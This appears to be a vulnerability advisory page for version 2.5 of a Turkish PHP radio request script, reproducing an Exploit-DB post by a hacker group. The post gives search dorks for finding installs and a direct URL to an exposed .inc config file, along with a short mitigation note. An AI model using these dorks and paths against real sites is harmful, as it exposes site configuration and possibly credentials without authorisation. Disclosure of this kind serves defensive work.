turkish radio php script

vendor:

RADIO istek scripti (tr)

by:

kurdish hackers team

6.4

CVSS

MEDIUM

Remote config Vulnerability

N/A

CWE

Product Name: RADIO istek scripti (tr)

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

RADIO istek scripti (tr) Version 2.5 (tr) is vulnerable to a remote configuration vulnerability. An attacker can exploit this vulnerability by using a dork such as '2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5' or 'estafresgaftesantusyan.inc' to find vulnerable sites and then accessing the estafresgaftesantusyan.inc file to view the configuration information.

Mitigation:

Ensure that the estafresgaftesantusyan.inc file is not accessible from the web server.

Source

Exploit-DB raw data:

turkish radio php script
======================================================

RADIO istek scripti (tr) Version 2.5 (tr) Remote config Vulnerability


<<!>> Found by? :? kurdish hackers team

<<!>> C0ntact : pshela [at] YaHoo .com 

<<!>> Groups : Kurd-Team 

<<!>> site : www.kurdteam.org

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script :: RADIO istek scripti (tr) Version 2.5 (tr)

<<->> download script ::
 http://www.scriptlerim.net/download/radio-istek-scripti-tr-.html

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Dork:"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5"
<<->> 0r
<<->> Dork:"estafresgaftesantusyan.inc"


<<->> Exploit ::

>>> http://server/path/estafresgaftesantusyan.inc

Now can see all information Config ...

=======================================================

=======================================================

<<->> All freinds , Zryan_kurd , all member kurdish hackers
 team